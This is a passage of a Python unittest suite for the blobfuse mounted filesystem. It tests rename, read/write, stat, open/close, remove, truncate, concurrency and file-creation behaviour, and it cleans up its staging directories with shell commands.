            #os.system("sudo chmod 777 " + self.localdir)
        if not os.path.exists(self.blobstage):
            os.system("sudo mkdir " + self.blobstage)
            #os.system("sudo chown -R `whoami` " + self.blobstage)
            #os.system("sudo chmod 777 " + self.blobstage)
    def tearDown(self):
        """Empty (but keep) the staging dirs after each test."""
        if os.path.exists(self.blobstage):
            os.system("sudo rm -rf " + self.blobstage + "/*")
            #shutil.rmtree(self.blobstage)
        if os.path.exists(self.localdir):
            os.system("sudo rm -rf " + self.localdir + "/*")
    # helper functions
    def validate_dir_removal(self, dirPath, dirName, parentDir):
        """Assert dirPath is gone: stat and chdir must fail with ENOENT
        and the name must be absent from the parent's listing."""
        with self.assertRaises(OSError) as e:
            os.stat(dirPath)
        self.assertEqual(e.exception.errno, errno.ENOENT)
        homeDir = os.getcwd()
        with self.assertRaises(OSError) as e:
            os.chdir(dirPath)
        self.assertEqual(e.exception.errno, errno.ENOENT)
        os.chdir(homeDir)
        entries = os.listdir(parentDir)
        self.assertFalse(dirName in entries)
    # validates directory was created
    def validate_dir_creation(self, dirpath, dirName, parentDir):
        """Assert dirpath exists, can be entered, and is the only entry
        listed in parentDir."""
        os.stat(dirpath) # As long as this does not raise a FileNotFoundError, we are satisfied
        # Save values to move back to where we started and build testDir absolute path
        homeDir = os.getcwd()
        os.chdir(parentDir)
        parentDirAbsolute = os.getcwd()
        # Test that we can successfully move into the dir
        os.chdir(dirName)
        self.assertEqual(os.path.join(parentDirAbsolute, dirName), os.getcwd())
        # Test that we see the subdir when listing the current dir
        os.chdir("..")
        dir_entries = os.listdir(parentDirAbsolute)
        self.assertTrue(len(dir_entries) == 1)
        self.assertTrue(dirName in dir_entries)
        # Return to the test dir to continue with other tests
        os.chdir(homeDir)
    # validates file was removed
    def validate_file_removal(self, filePath, fileName, parentDir):
        """Assert filePath no longer exists and is not listed in parentDir."""
        with self.assertRaises(OSError) as e:
            os.stat(filePath)
        self.assertEqual(e.exception.errno, errno.ENOENT)
        entries = os.listdir(parentDir)
        self.assertFalse(fileName in entries)
    # validates file was created
    def validate_file_creation(self, filePath, fileName, parentDir):
        """Assert filePath exists and is listed in parentDir."""
        os.stat(filePath) # As long as this doesn't fail, we are satisfied
        # print(os.stat(testFilePath))
        entries = os.listdir(parentDir)
        self.assertTrue(fileName in entries)
    # reads from file
    def read_file_func(self, filePath, start, end, testData):
        """Read bytes [start, end) of filePath and assert they match the
        same slice of testData (a str)."""
        fd = os.open(filePath, os.O_RDONLY)
        os.lseek(fd, start, os.SEEK_SET)
        data = os.read(fd, end - start)
        self.assertEqual(data.decode(), testData[start:end])
        os.close(fd)
    # writes to file
    def write_file_func(self, filePath, data):
        """Append data (a str) to filePath."""
        fd = os.open(filePath, os.O_WRONLY | os.O_APPEND)
        os.write(fd, data.encode())
        os.close(fd)
class RenameTests(BlobfuseTest):
    """Rename/move semantics for files and directories on the mount."""

    # renames empty file within the same directory
    def test_rename_file_same_dir(self):
        testFileName = "testFile"
        testFilePath = os.path.join(self.blobstage, testFileName)
        testFileNewName = "testFileMoved"
        testFileNewPath = os.path.join(self.blobstage, testFileNewName)
        fd = os.open(testFilePath, os.O_CREAT)
        os.close(fd)
        os.system("mv " + testFilePath + " " + testFileNewPath)
        #os.rename(testFilePath, testFileNewPath)
        with self.assertRaises(OSError) as e:
            os.stat(testFilePath)
        self.validate_file_removal(testFilePath, testFileName, self.blobstage)
        self.validate_file_creation(testFileNewPath, testFileNewName, self.blobstage)
        os.remove(testFileNewPath)

    # moves/renames empty file to another directory
    def test_rename_file_change_dir(self):
        testFileName = "testFile"
        testFilePath = os.path.join(self.blobstage, testFileName)
        testDirName = "TestDir"
        testDirPath = os.path.join(self.blobstage, testDirName)
        destFilePath = os.path.join(testDirPath, testFileName)
        os.mkdir(testDirPath)
        fd = os.open(testFilePath, os.O_CREAT)
        os.close(fd)
        os.system("mv " + testFilePath + " " + destFilePath)
        #os.rename(testFilePath, destFilePath)
        self.validate_file_removal(testFilePath, testFileName, self.blobstage)
        self.validate_file_creation(destFilePath, testFileName, testDirPath)
        os.remove(destFilePath)
        os.rmdir(testDirPath)

    # renames nonempty file
    def test_rename_file_non_empty(self):
        testFileName = "testFile"
        testFilePath = os.path.join(self.blobstage, testFileName)
        destFileName = "newFile"
        destFilePath = os.path.join(self.blobstage, destFileName)
        fd = os.open(testFilePath, os.O_CREAT | os.O_WRONLY)
        testData = "test data"
        os.write(fd, testData.encode())
        os.close(fd)
        os.system("mv " + testFilePath + " " + destFilePath)
        #os.rename(testFilePath, destFilePath)
        fd = os.open(destFilePath, os.O_RDONLY)
        data = os.read(fd, 20)
        self.assertEqual(data.decode(), testData)
        os.close(fd)  # fix: this descriptor was previously leaked
        os.remove(destFilePath)

    # renames subdirectory in the same parent directory
    def test_rename_dir(self):
        testDirName = "TestDir"
        testDirPath = os.path.join(self.blobstage, testDirName)
        destDirName = "NewDir"
        destDirPath = os.path.join(self.blobstage, destDirName)
        os.mkdir(testDirPath)
        os.rename(testDirPath, destDirPath)
        self.validate_dir_removal(testDirPath, testDirName, self.blobstage)
        self.validate_dir_creation(destDirPath, destDirName, self.blobstage)
        os.rmdir(destDirPath)

    # renames/moves empty subdirectory to a different parent directory
    def test_rename_dir_change_dir(self):
        testDirParent = "ParentDir"
        parentDirPath = os.path.join(self.blobstage, testDirParent)
        destParentDir = "ParentDest"
        destParentPath = os.path.join(self.blobstage, destParentDir)
        testDirName = "TestDir"
        testDirPath = os.path.join(parentDirPath, testDirName)
        destDirPath = os.path.join(destParentPath, testDirName)
        os.mkdir(parentDirPath)
        os.mkdir(testDirPath)
        os.mkdir(destParentPath)
        os.rename(testDirPath, destDirPath)
        self.validate_dir_removal(testDirPath, testDirName, parentDirPath)
        self.validate_dir_creation(destDirPath, testDirName, destParentPath)
        os.rmdir(destDirPath)
        os.rmdir(destParentPath)
        os.rmdir(parentDirPath)

    # renames nonempty directory within same parent directory
    def test_rename_dir_nonempty(self):
        testDirName = "TestDir"
        testDirPath = os.path.join(self.blobstage, testDirName)
        testFileName = "testFile"
        testFilePath = os.path.join(testDirPath, testFileName)
        destDirName = "newDirName"
        destDirPath = os.path.join(self.blobstage, destDirName)
        os.mkdir(testDirPath)
        fd = os.open(testFilePath, os.O_CREAT)
        os.rename(testDirPath, destDirPath)
        with self.assertRaises(OSError) as e:
            os.stat(testFilePath)
        self.assertEqual(e.exception.errno, errno.ENOENT)
        os.stat(os.path.join(destDirPath, testFileName))
        os.close(fd)
        os.remove(os.path.join(destDirPath, testFileName))
        os.rmdir(destDirPath)

    # Attempts to rename a directory that doesn't exist, expect error
    def test_rename_no_directory(self):
        testDirName = "TestDir"
        testDirPath = os.path.join(self.blobstage, testDirName)
        destDirName = "newDirName"
        destDirPath = os.path.join(self.blobstage, destDirName)
        with self.assertRaises(OSError) as e:
            os.rename(testDirPath, destDirPath)
        self.assertEqual(e.exception.errno, errno.ENOENT)

    # Attempts to rename a file that doesn't exist, expect error
    def test_rename_no_file(self):
        testDirName = "TestDir"
        testDirPath = os.path.join(self.blobstage, testDirName)
        testFileName = "testFile"
        testFilePath = os.path.join(testDirPath, testFileName)
        testNewFileName = "testFile2"
        testNewFilePath = os.path.join(testDirPath, testNewFileName)
        os.mkdir(testDirPath)
        with self.assertRaises(OSError) as e:
            os.rename(testFilePath, testNewFilePath)
        self.assertEqual(e.exception.errno, errno.ENOENT)
        os.rmdir(testDirPath)

    # test to rename directory to an existing directory
    # Fix: this method was previously also named test_rename_dir_change_dir,
    # which silently shadowed the earlier definition of that name so only one
    # of the two ever ran. Renamed so unittest discovers both.
    # NOTE(review): the body is currently identical to
    # test_rename_dir_change_dir; per the comment above it was probably
    # intended to rename onto an already-existing destination — confirm intent.
    def test_rename_dir_to_existing_dir(self):
        testDirParent = "ParentDir"
        parentDirPath = os.path.join(self.blobstage, testDirParent)
        destParentDir = "ParentDest"
        destParentPath = os.path.join(self.blobstage, destParentDir)
        testDirName = "TestDir"
        testDirPath = os.path.join(parentDirPath, testDirName)
        destDirPath = os.path.join(destParentPath, testDirName)
        os.mkdir(parentDirPath)
        os.mkdir(testDirPath)
        os.mkdir(destParentPath)
        os.rename(testDirPath, destDirPath)
        self.validate_dir_removal(testDirPath, testDirName, parentDirPath)
        self.validate_dir_creation(destDirPath, testDirName, destParentPath)
        os.rmdir(destDirPath)
        os.rmdir(destParentPath)
        os.rmdir(parentDirPath)
class ReadWriteFileTests(BlobfuseTest):
    """Round-trip write/read behaviour through the mounted container."""

    # test to write to a blob and read from it (regular ascii)
    def test_WriteReadSingleFile(self):
        contents = "Some file1 text here."
        target = os.path.join(self.blobstage, "file1")
        with open(target, 'w') as writer:
            writer.write(contents)
        self.assertEqual(True, os.path.exists(target))
        with open(target, 'r') as reader:
            roundTrip = reader.read()
        self.assertEqual(contents, roundTrip)
        os.remove(target)
        self.assertEqual(False, os.path.exists(target))

    # test to write to a blob and read from it (unicode)
    def test_WriteReadSingleFileUnicode(self):
        contents = "}L"
        target = os.path.join(self.blobstage, ",: hello?world-we^areall~together1 .txt")
        #with open(filepath, 'w') as file1blob:
        #    file1blob.write(file1txt)
        shellCmd = "echo \"" + contents + "\" > \"" + target + "\""
        os.system(shellCmd)
        self.assertEqual(True, os.path.exists(target))
        with open(target, 'r') as reader:
            roundTrip = reader.read()
        # echo appends a trailing newline to what it writes
        self.assertEqual(contents + "\n", roundTrip)
        os.remove(target)
        self.assertEqual(False, os.path.exists(target))

    # test to overwrite file from beginning
    def test_write_file_overwrite_beginning(self):
        target = os.path.join(self.blobstage, "TestFile")
        handle = os.open(target, os.O_CREAT | os.O_RDWR)
        os.write(handle, "test data".encode())
        os.lseek(handle, 0, os.SEEK_SET)
        replacement = "overwrite all"
        os.write(handle, replacement.encode())
        os.lseek(handle, 0, os.SEEK_SET)
        self.assertEqual(os.read(handle, 20).decode(), replacement)
        os.close(handle)
        os.remove(target)

    # test to append to a file that already has data
    def test_write_file_append_to_end(self):
        target = os.path.join(self.blobstage, "TestFile")
        first = "test data"
        second = "more data"
        handle = os.open(target, os.O_CREAT | os.O_WRONLY)
        os.write(handle, first.encode())
        os.close(handle)
        handle = os.open(target, os.O_WRONLY | os.O_APPEND)
        os.write(handle, second.encode())
        os.close(handle)
        handle = os.open(target, os.O_RDONLY)
        self.assertEqual(os.read(handle, 30).decode(), first + second)
        os.close(handle)
        os.remove(target)

    # test to make medium sized blobs
    # this test takes around 10 - 20 minutes
    def test_medium_files(self):
        srcDir = os.path.join(self.blobstage, "srcmediumblobs")
        if not os.path.exists(srcDir):
            os.makedirs(srcDir)
        blobCount = 2 if LOCAL_TEST else 10
        for _ in range(blobCount):
            blobPath = os.path.join(srcDir, str(uuid.uuid4()))
            if LOCAL_TEST:
                os.system("head -c 1M < /dev/zero >> " + blobPath)
            else:
                os.system("head -c 1M < /dev/urandom > " + blobPath)
                os.system("head -c 200M < /dev/zero >> " + blobPath)
                os.system("head -c 10M < /dev/urandom >> " + blobPath)
        self.assertEqual(blobCount, len(os.listdir(srcDir)))
        localCopyDir = os.path.join(self.localdir, "localmediumblobs")
        shutil.copytree(srcDir, localCopyDir)
        self.assertEqual(blobCount, len(os.listdir(localCopyDir)))
        destDir = os.path.join(self.blobstage, "destmediumblobs")
        os.system("cp -R " + localCopyDir + " " + destDir)
        self.assertEqual(blobCount, len(os.listdir(destDir)))
class StatsTests(BlobfuseTest):
    """stat/statvfs attribute checks: sizes, ownership, timestamps."""

    # test to check the stats of a directory, a file, and a nonexistent file(expect error here)
    def test_filesystem_stats(self):
        testDir = os.path.join(self.blobstage, "testDirectory")
        testFile = os.path.join(testDir, "file1")
        testNonexistingFile = os.path.join(testDir, "file2")
        os.makedirs(testDir)
        with open(testFile, 'w') as fileblob:
            fileblob.write("Dummy file")
        dirResult = os.statvfs(testDir)
        fileResult = os.statvfs(testFile)
        self.assertNotEqual(dirResult.f_bavail, 0)
        self.assertNotEqual(fileResult.f_bavail, 0)
        # Fix: the old try/except only verified the errno when an exception
        # happened to be raised; if statvfs succeeded the test silently
        # passed. assertRaises makes the expected failure mandatory.
        with self.assertRaises(OSError) as e:
            os.statvfs(testNonexistingFile)
        self.assertEqual(e.exception.errno, errno.ENOENT)
        os.system("sudo rm -rf " + testDir)

    # test to check the stats of a file
    def test_stat_file(self):
        testFileName = "TestFile"
        testFilePath = os.path.join(self.blobstage, testFileName)
        # fd = os.open(testFilePath, os.O_CREAT | os.O_WRONLY)
        f = open(testFilePath, "w")
        testData = "test data"
        # os.write(fd, testData.encode())
        f.write(testData)
        f.close()
        self.assertEqual(os.stat(testFilePath).st_size, len(testData))
        os.remove(testFilePath)

    # test to check the stats of a directory
    def test_stat_dir(self):
        testDirName = "TestDir"
        testDirPath = os.path.join(self.blobstage, testDirName)
        os.mkdir(testDirPath)
        self.assertEqual(os.stat(testDirPath).st_size, 4096) # The minimum directory size on Linux
        os.rmdir(testDirPath)

    # test if stat updates after each write operation and check contents as well
    def test_write_stat_operations(self):
        testFilePath = os.path.join(self.blobstage, "testfile")
        data1000 = bytearray(os.urandom(1000))
        data500 = bytearray(os.urandom(500))
        # write, append, then truncate-rewrite, checking size and contents
        # after each step
        with open(testFilePath, 'wb') as testFile:
            testFile.write(data1000)
        self.assertEqual(1000, os.stat(testFilePath).st_size)
        with open(testFilePath, 'rb') as testFile:
            contents = testFile.read()
        self.assertEqual(data1000, contents)
        with open(testFilePath, 'ab') as testFile:
            testFile.write(data500)
        self.assertEqual(1500, os.stat(testFilePath).st_size)
        with open(testFilePath, 'rb') as testFile:
            contents = testFile.read()
        self.assertEqual(data1000 + data500, contents)
        with open(testFilePath, 'wb') as testFile:
            testFile.write(data500)
        self.assertEqual(500, os.stat(testFilePath).st_size)
        with open(testFilePath, 'rb') as testFile:
            contents = testFile.read()
        self.assertEqual(data500, contents)

    # check fileowner and timestamp on file
    def test_file_owner_timestamp(self):
        testFileName = "testUserAndTime"
        testFilePath = os.path.join(self.blobstage, testFileName)
        fd = os.open(testFilePath, os.O_CREAT | os.O_RDONLY)
        testData = "random data"
        self.write_file_func(testFilePath, testData)
        os.close(fd)
        # This verifies the getattr from the local cache
        fileowner = os.stat(testFilePath).st_uid
        filegroup = os.stat(testFilePath).st_gid
        time_of_upload = os.stat(testFilePath).st_mtime
        self.assertTrue(fileowner == os.getuid() or os.getuid() == 0)
        self.assertTrue(filegroup == os.getgid() or os.getuid() == 0)
        #self.assertEqual(fileowner, os.getuid())
        #self.assertEqual(filegroup, os.getgid())
        # This removes the cached entries of the files just created, so they are on the service but not local.
        shutil.rmtree(self.cachedir + '/root/testing/')
        time.sleep(1)
        # check whether getattr from the service is working
        fileowner = os.stat(testFilePath).st_uid
        filegroup = os.stat(testFilePath).st_gid
        blob_last_modified = os.stat(testFilePath).st_mtime
        self.assertTrue(fileowner == os.getuid() or os.getuid() == 0)
        self.assertTrue(filegroup == os.getgid() or os.getuid() == 0)
        diff = int(blob_last_modified) - int(time_of_upload)
        self.assertLess(diff, (2 * 60))
        #self.assertEqual(int(time_of_upload), int(blob_last_modified))
        # prime the cache and check the attributes again
        fd = os.open(testFilePath, os.O_RDONLY)
        # check whether getattr from the cache is working
        fileowner = os.stat(testFilePath).st_uid
        filegroup = os.stat(testFilePath).st_gid
        file_last_modified = os.stat(testFilePath).st_mtime
        self.assertTrue(fileowner == os.getuid() or os.getuid() == 0)
        self.assertTrue(filegroup == os.getgid() or os.getuid() == 0)
        # Fix: this previously re-compared blob_last_modified (already
        # verified above) instead of the freshly primed file_last_modified.
        diff = int(file_last_modified) - int(time_of_upload)
        self.assertLess(diff, (2 * 60))
        #self.assertEqual(int(time_of_upload), int(file_last_modified))
        os.close(fd)
        os.remove(testFilePath)

    # TODO: fix empty folder creation with incorrect date, test does not pass
    def test_stat_empty_dir_timestamp(self):
        testDirName = "TestDir"
        testDirPath = os.path.join(self.blobstage, testDirName)
        os.mkdir(testDirPath)
        currentTime = datetime.datetime.now()
        dirStat = os.stat(testDirPath)
        # Empty directory dates are coming to be 1970 only so no point in testing this out fo rnow
        #self.assertEqual(currentTime.strftime("%c"), time.ctime(dirStat[stat.ST_ATIME]))
        #self.assertEqual(currentTime.strftime("%c"), time.ctime(dirStat[stat.ST_MTIME]))
        #self.assertEqual(currentTime.strftime("%c"), time.ctime(dirStat[stat.ST_CTIME]))
        shutil.rmtree(testDirPath)

    # test to see if directory timestamp gets updated when a file is made, file and directory should have same timestamp
    def test_stat_file_dir_timestamp(self):
        testDirName = "TestDir"
        testDirPath = os.path.join(self.blobstage, testDirName)
        os.mkdir(testDirPath)
        testFileName = "testUserAndTime"
        testFilePath = os.path.join(testDirPath, testFileName)
        fd = os.open(testFilePath, os.O_CREAT)
        os.close(fd)
        currentTime = datetime.datetime.now()
        dirStat = os.stat(testDirPath)
        fileStat = os.stat(testFilePath)
        # Allow up to two minutes of skew between local clock and service
        # timestamps for every field checked below.
        diff = int(currentTime.strftime("%s")) - dirStat[stat.ST_ATIME]
        self.assertLess(diff, (2 * 60))
        #self.assertEqual(currentTime.strftime("%c"), time.ctime(dirStat[stat.ST_ATIME]))
        diff = int(currentTime.strftime("%s")) - dirStat[stat.ST_MTIME]
        self.assertLess(diff, (2 * 60))
        #self.assertEqual(currentTime.strftime("%c"), time.ctime(dirStat[stat.ST_MTIME]))
        diff = int(currentTime.strftime("%s")) - fileStat[stat.ST_ATIME]
        self.assertLess(diff, (2 * 60))
        #self.assertEqual(currentTime.strftime("%c"), time.ctime(fileStat[stat.ST_ATIME]))
        diff = int(currentTime.strftime("%s")) - fileStat[stat.ST_MTIME]
        self.assertLess(diff, (2 * 60))
        #self.assertEqual(currentTime.strftime("%c"), time.ctime(fileStat[stat.ST_MTIME]))
        diff = int(currentTime.strftime("%s")) - fileStat[stat.ST_CTIME]
        self.assertLess(diff, (2 * 60))
        #self.assertEqual(currentTime.strftime("%c"), time.ctime(fileStat[stat.ST_CTIME]))
        os.remove(testFilePath)
        shutil.rmtree(testDirPath)
class OpenFileTests(BlobfuseTest):
    """os.open behaviour: missing files, access-mode enforcement,
    concurrent handles, and opening directories."""

    # attempts to read file that doesn't exist, expect error
    def test_open_file_nonexistent_file_read(self):
        missingPath = os.path.join(self.blobstage, "TestFile")
        with self.assertRaises(OSError) as ctx:
            os.open(missingPath, os.O_RDONLY)
        self.assertEqual(ctx.exception.errno, errno.ENOENT)

    # attempts to write to a file that doesn't exist, expect error
    def test_open_file_nonexistent_file_write(self):
        missingPath = os.path.join(self.blobstage, "TestFile")
        with self.assertRaises(OSError) as ctx:
            os.open(missingPath, os.O_WRONLY)
        self.assertEqual(ctx.exception.errno, errno.ENOENT)

    # test open an empty file in write only, write to it, close it
    # reopen the file in read only to check if we can read the contents
    def test_open_file_exists_read_write_empty(self):
        target = os.path.join(self.blobstage, "TestFile")
        payload = "Test data"
        handle = os.open(target, os.O_CREAT | os.O_WRONLY) # This covers opening a file that exists and is empty
        os.write(handle, payload.encode())
        os.close(handle) # It would be possible to seek, but that should be a separate test. Reoping is more granular
        handle = os.open(target, os.O_CREAT | os.O_RDONLY)
        self.assertEqual(os.read(handle, 15).decode(), payload)
        os.close(handle)
        os.remove(target)

    # create/open file in write only, then try to read from it and expect an error
    # then open the file in read only and attempt to write to it and expect an error
    def test_open_file_read_only_write_only(self):
        target = os.path.join(self.blobstage, "TestFile")
        payload = "Test data"
        handle = os.open(target, os.O_CREAT | os.O_WRONLY)
        os.write(handle, payload.encode())
        with self.assertRaises(OSError) as ctx:
            os.read(handle, 20)
        self.assertEqual(ctx.exception.errno, errno.EBADF)
        os.close(handle)
        # This also tests opening a non-empty file and a file that was closed
        handle = os.open(target, os.O_RDONLY)
        with self.assertRaises(OSError) as ctx:
            os.write(handle, payload.encode())
        self.assertEqual(ctx.exception.errno, errno.EBADF)
        self.assertEqual(os.read(handle, 20).decode(), payload)
        os.close(handle)
        os.remove(target)

    # test if we can open the same file in write only, then in read only then using the
    # respective file handles, read and write to the file
    def test_open_file_already_open(self):
        target = os.path.join(self.blobstage, "TestFile")
        writer = os.open(target, os.O_CREAT | os.O_WRONLY)
        reader = os.open(target, os.O_CREAT | os.O_RDONLY)
        payload = "test data"
        os.write(writer, payload.encode())
        self.assertEqual(os.read(reader, 20).decode(), payload)
        os.close(writer)
        os.close(reader)
        os.remove(target)

    # expect an error if we try to open a directory path
    def test_open_dir_exists(self):
        # expect failure
        dirPath = os.path.join(self.blobstage, "TestDir")
        os.mkdir(dirPath)
        with self.assertRaises(OSError) as ctx:
            os.open(dirPath, os.O_CREAT | os.O_RDWR)
        self.assertEqual(ctx.exception.errno, errno.EISDIR)
        os.rmdir(dirPath)
class CloseFileTests(BlobfuseTest):
    """close(2) behaviour: closing from another thread, use-after-close,
    and double close."""

    # helper function for closing file through a process/thread
    def close_file_func(self, filePath):
        handle = os.open(filePath, os.O_RDONLY)
        os.close(handle)

    # opening a file after another process opened it
    def test_read_file_after_another_process_closes(self):
        target = os.path.join(self.blobstage, "TestFile")
        payload = "test data"
        handle = os.open(target, os.O_CREAT | os.O_RDWR)
        os.write(handle, payload.encode())
        os.lseek(handle, 0, os.SEEK_SET)
        # another thread opens and closes the same file; our handle must
        # remain usable afterwards
        worker = threading.Thread(target=self.close_file_func, args=(target,))
        worker.start()
        worker.join()
        self.assertEqual(os.read(handle, 20).decode(), payload)
        os.close(handle)
        os.remove(target)

    # test file after we opened it, expect error when we try to write to a file that's closed
    def test_close_file(self):
        target = os.path.join(self.blobstage, "TestFile")
        handle = os.open(target, os.O_CREAT | os.O_WRONLY)
        os.close(handle)
        with self.assertRaises(OSError) as ctx:
            os.write(handle, "data".encode())
        self.assertEqual(ctx.exception.errno, errno.EBADF)
        os.remove(target)

    # test file after we opened it, closed it and expect an error after we try to close it again
    def test_close_file_twice(self):
        target = os.path.join(self.blobstage, "TestFile")
        handle = os.open(target, os.O_CREAT | os.O_WRONLY)
        os.close(handle)
        with self.assertRaises(OSError) as ctx:
            os.close(handle)
        self.assertEqual(ctx.exception.errno, errno.EBADF)
        os.remove(target)
class RemoveFileTests(BlobfuseTest):
    """File removal: normal, while-open, nonexistent, and double remove."""

    # test if we can remove a file
    def test_remove_file(self):
        testFileName = "TestFile"
        testFilePath = os.path.join(self.blobstage, testFileName)
        f = os.open(testFilePath, os.O_CREAT)
        os.close(f)
        os.remove(testFilePath)
        self.validate_file_removal(testFilePath, testFileName, self.blobstage)

    # test if we can remove a file that's still open
    def test_remove_file_still_open(self):
        testFileName = "TestFile"
        testFilePath = os.path.join(self.blobstage, testFileName)
        f = os.open(testFilePath, os.O_CREAT)
        os.remove(testFilePath)
        self.validate_file_removal(testFilePath, testFileName, self.blobstage)
        # Fix: the descriptor was previously left open for the remainder of
        # the test run (leak); closing after removal keeps the test intent
        # (remove-while-open) intact.
        os.close(f)

    # expect an error if we try to remove a file that doesn't exist
    def test_remove_nonexistent(self):
        testFileName = "TestFile"
        testFilePath = os.path.join(self.blobstage, testFileName)
        # throw exception here, expect OSError
        with self.assertRaises(OSError) as e:
            os.remove(testFilePath)
        self.assertEqual(e.exception.errno, errno.ENOENT)
        self.validate_file_removal(testFilePath, testFileName, self.blobstage)

    # expect an error if we try to remove a file that has already been removed
    def test_remove_file_twice(self):
        testFileName = "TestFile"
        testFilePath = os.path.join(self.blobstage, testFileName)
        f = os.open(testFilePath, os.O_CREAT)
        os.close(f)
        os.remove(testFilePath)
        self.validate_file_removal(testFilePath, testFileName, self.blobstage)
        # throw exception here, expect OSError
        with self.assertRaises(OSError) as e:
            os.remove(testFilePath)
        self.assertEqual(e.exception.errno, errno.ENOENT)
        self.validate_file_removal(testFilePath, testFileName, self.blobstage)
class TruncateTests(BlobfuseTest):
    """ftruncate behaviour: shrink to zero, shrink/extend, empty file."""

    # test if we can truncate a file
    def test_truncate_file(self):
        target = os.path.join(self.blobstage, "TestFile")
        handle = os.open(target, os.O_CREAT | os.O_WRONLY)
        os.write(handle, "random data".encode())
        os.ftruncate(handle, 0)
        os.close(handle)
        self.assertEqual(os.stat(target).st_size, 0)
        os.remove(target)

    # test if we can truncate a file and if we can read from it and open it and truncate it again
    def test_truncate_file_non_zero(self):
        target = os.path.join(self.blobstage, "TestFile")
        handle = os.open(target, os.O_CREAT | os.O_WRONLY)
        os.write(handle, "random data".encode())
        os.ftruncate(handle, 5)
        os.close(handle)
        self.assertEqual(os.stat(target).st_size, 5)
        with open(target, 'rb') as reader:
            self.assertEqual("rando".encode(), reader.read())
        # extend past the current end via a second truncate
        handle = os.open(target, os.O_RDWR)
        os.ftruncate(handle, 30)
        os.close(handle)
        self.assertEqual(os.stat(target).st_size, 30)
        os.remove(target)

    # test to truncate an empty file
    def test_truncate_empty_file(self):
        # dunno if should expecting error here or not
        target = os.path.join(self.blobstage, "TestFile")
        handle = os.open(target, os.O_CREAT | os.O_WRONLY)
        os.ftruncate(handle, 0)
        os.close(handle)
        self.assertEqual(os.stat(target).st_size, 0)
        os.remove(target)
class ThreadTests(BlobfuseTest):
    """Concurrency tests: multiple threads/handles operating on the same mounted file."""

    # test if we can read from the same file at the same time with multiple processes
    def test_file_simultaneous_read(self):
        testFileName = "testFile"
        testFilePath = os.path.join(self.blobstage, testFileName)
        fd = os.open(testFilePath, os.O_CREAT | os.O_WRONLY)
        testData = "Plenty of data for simultaneous reads"
        os.write(fd, testData.encode())
        os.close(fd)
        # Each thread reads a different slice and compares it against testData.
        # read_file_func is inherited from BlobfuseTest -- presumably
        # (path, start, end, expected); TODO confirm against the base class.
        thread1 = threading.Thread(target=self.read_file_func, args=(testFilePath, 0, 10, testData,))
        thread2 = threading.Thread(target=self.read_file_func, args=(testFilePath, 10, 20, testData,))
        thread3 = threading.Thread(target=self.read_file_func, args=(testFilePath, 20, len(testData), testData,))
        thread1.start()
        thread2.start()
        thread3.start()
        thread1.join()
        thread2.join()
        thread3.join()
        os.remove(testFilePath)

    # tests if we can write to the same file with multiple threads
    def test_file_simultaneous_write(self):
        testFileName = "testFile"
        testFilePath = os.path.join(self.blobstage, testFileName)
        # This fd only creates the file; each thread opens its own write handle.
        fd = os.open(testFilePath, os.O_CREAT | os.O_RDONLY)
        testData = "random data"
        thread1 = threading.Thread(target=self.write_file_func, args=(testFilePath, testData))
        thread2 = threading.Thread(target=self.write_file_func, args=(testFilePath, testData))
        thread3 = threading.Thread(target=self.write_file_func, args=(testFilePath, testData))
        thread1.start()
        thread2.start()
        thread3.start()
        thread1.join()
        thread2.join()
        thread3.join()
        # All three writes must land; write_file_func presumably appends -- TODO confirm.
        self.assertEqual(os.stat(testFilePath).st_size, len(testData) * 3)
        os.close(fd)
        os.remove(testFilePath)

    def test_multiple_file_handles_on_single_file(self):
        # This is to test whether close of a file handle impacts other open file handles on the same file
        # reported in issue 57
        testFileName = "testFile_new" + str(random.randint(0, 10000))
        testFilePath = os.path.join(self.blobstage, testFileName)
        repeat = random.randint(1, 10)
        fd1 = os.open(testFilePath, os.O_WRONLY | os.O_CREAT)
        fd2 = os.open(testFilePath, os.O_WRONLY)
        os.close(fd2)
        # sleep until cache times out
        # TODO: Improve test execution time by reducing cache timeout
        time.sleep(130)
        testData = "random data"
        # fd1 must still be writable even after fd2 closed and the cache expired.
        for i in range(0, repeat):
            os.write(fd1, testData.encode())
        os.close(fd1)
        self.assertEqual(os.stat(testFilePath).st_size, len(testData.encode()) * repeat)

    def test_multiple_threads_create_cache_directory_simultaneous(self):
        # This is to test the fix to a bug that reported failure if multiple threads simultaneously called ensure_directory_exists_in_cache.
        # The directory would be successfully created, but many threads would fail because they would try to create it after another thread had already done so.
        sourceDirName = "mediumblobs-2"
        mediumBlobsSourceDir = os.path.join(self.blobstage, sourceDirName)
        if not os.path.exists(mediumBlobsSourceDir):
            os.makedirs(mediumBlobsSourceDir);
        # We must use different files for each thread to avoid the synchronization that would occur if all threads access the same file
        if LOCAL_TEST :
            N = 2
        else :
            N = 20
        for i in range(0, N):
            filename = str(uuid.uuid4())
            filepath = os.path.join(mediumBlobsSourceDir, filename)
            if LOCAL_TEST :
                os.system("head -c 1M < /dev/zero >> " + filepath);
            else :
                os.system("head -c 100M < /dev/zero >> " + filepath);
        # This removes the cached entries of the files just created, so they are on the service but not local.
        # This will force each thread to call ensure_directory_exists_in_cache when trying to access its file.
        shutil.rmtree(self.cachedir + '/root/testing/' + sourceDirName)
        threads = []
        for filename in os.listdir(mediumBlobsSourceDir):
            path = os.path.join(mediumBlobsSourceDir, filename)
            threads.append(threading.Thread(target=self.read_file_func, args=(
                path, 0, 0, "",)))  # Note that read_file_func also opens the file, which is the desired behavior
        for thread in threads:
            thread.start()
        for thread in threads:
            thread.join()
        shutil.rmtree(mediumBlobsSourceDir)
class CreateFileTests(BlobfuseTest):
    """File-creation tests: new files, name conflicts, and symlinks."""

    # test to create a new file
    def test_create_file_new_file(self):
        testFileName = "TestFile"
        testFilePath = os.path.join(self.blobstage, testFileName)
        fd = os.open(testFilePath, os.O_CREAT | os.O_WRONLY | os.O_TRUNC)
        # open(testFilePath, "w")
        # validate_file_creation is provided by BlobfuseTest -- presumably checks
        # that the file exists and appears in the parent listing; TODO confirm.
        self.validate_file_creation(testFilePath, testFileName, self.blobstage)
        os.close(fd)
        os.remove(testFilePath)

    # expect error trying to create a file of a name that is already taken
    def test_create_file_name_conflict_file(self):
        testFileName = "TestFile"
        testFilePath = os.path.join(self.blobstage, testFileName)
        fd = os.open(testFilePath, os.O_CREAT)
        # O_CREAT | O_EXCL on an existing path must fail with EEXIST
        with self.assertRaises(OSError) as e:
            os.open(testFilePath, os.O_EXCL | os.O_CREAT)
        self.assertEqual(e.exception.errno, errno.EEXIST)
        os.close(fd)
        os.remove(testFilePath)

    # expect error when trying to create a file with the name of a directory that already exists
    def test_create_file_name_conflict_dir(self):
